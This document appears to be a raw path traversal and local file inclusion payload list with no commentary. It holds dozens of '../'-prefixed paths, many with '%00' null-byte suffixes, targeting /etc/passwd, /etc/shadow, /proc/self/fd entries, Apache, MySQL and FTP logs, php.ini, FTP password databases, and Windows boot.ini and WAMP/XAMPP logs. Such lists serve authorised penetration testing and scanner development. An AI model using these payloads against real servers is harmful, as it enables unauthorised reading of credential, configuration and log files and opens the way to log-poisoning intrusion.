../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../../../proc/self/fd/4%00
../../../../../../../../../../../../../../proc/self/fd/16
../../../../../../../../../../../../../../../../proc/self/fd/15%00
../../../../../../../../../../../../../../../proc/self/fd/24%00
../../../../../../../../../../../../var/log/access.log
../../../../../../../../../../../../../var/log/access.log%00
../../../../../../../../../../../../../../apache2/logs/error.log
../../../../../../../../../../../../../../apache2/logs/error.log%00
../../../../../../../../../../../../../usr/local/apache2/logs/error_log
../../../../../../../../../../../../../usr/local/apache2/logs/error_log%00
../../../../../../../../../../../../../../etc/apache2/httpd.conf%00
../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php%00
../../../../../../../../../../../../usr/local/php5/httpd.conf.php
../../../../../../../../../../../../../../../etc/httpd/php.ini%00
../../../../../../../../../../../../../etc/httpd/php.ini
../../../../../../../../../../../xampp/apache/bin/php.ini
../../../../../../../../../../../../../xampp/apache/bin/php.ini%00
../../../../../../../../../../../../../home/bin/stable/apache/php.ini
../../../../../../../../../../../../../usr/local/cpanel/logs/access_log
../../../../../../../../../../../../../usr/local/cpanel/logs/access_log%00
../../../../../../../../../../../var/log/mysql/mysql-bin.log
../../../../../../../../../../../var/log/mysql/mysql-bin.log%00
../../../../../../../../../../../../../../../../var/log/mysql/mysql.log
../../../../../../../../../../../../../../../var/log/mysql/mysql.log%00
../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log
../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log%00
../../../../../../../../../../../../../etc/logrotate.d/proftpd%00
../../../../../../../../../../../../../../../www/logs/proftpd.system.log
../../../../../../../../../../etc/vsftpd.chroot_list
../../../../../../../../../../../../../../../var/log/vsftpd.log%00
../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb
../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb%00
../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb%00
../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb
../../../../../../../../../usr/ports/contrib/pure-ftpd/
../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/%00
../../../../../../../../../../../var/log/pureftpd.log%00
../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log
../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log%00
../../../../../../../../../../../var/log/exim_rejectlog%00
../../../../../../../../../../../var/log/exim_rejectlog
C:\boot.ini
C:/boot.ini
C:\wamp\logs\access.log
c:\wamp\logs\access.log
c:/wamp/logs/access.log
C:/wamp/logs/access.log
C:/xampp/logs/access.log
c:/xampp/logs/access.log
C:/WAMP/logs/access.log
C:\xampp\logs\access.log
c:\boot.ini
c:/boot.ini
C:/XAMPP/logs/access.log
c:/XAMPP/logs/access.log
C:\XAMPP\logs\access.log
c:\XAMPP\logs\access.log
D:\boot.ini
D:/boot.ini
D:\wamp\logs\access.log
d:\wamp\logs\access.log
d:/wamp/logs/access.log
D:/wamp/logs/access.log
D:/xampp/logs/access.log
d:/xampp/logs/access.log
D:/WAMP/logs/access.log
D:\xampp\logs\access.log
d:\boot.ini
d:/boot.ini
D:/XAMPP/logs/access.log
d:/XAMPP/logs/access.log
D:\XAMPP\logs\access.log
d:\XAMPP\logs\access.log
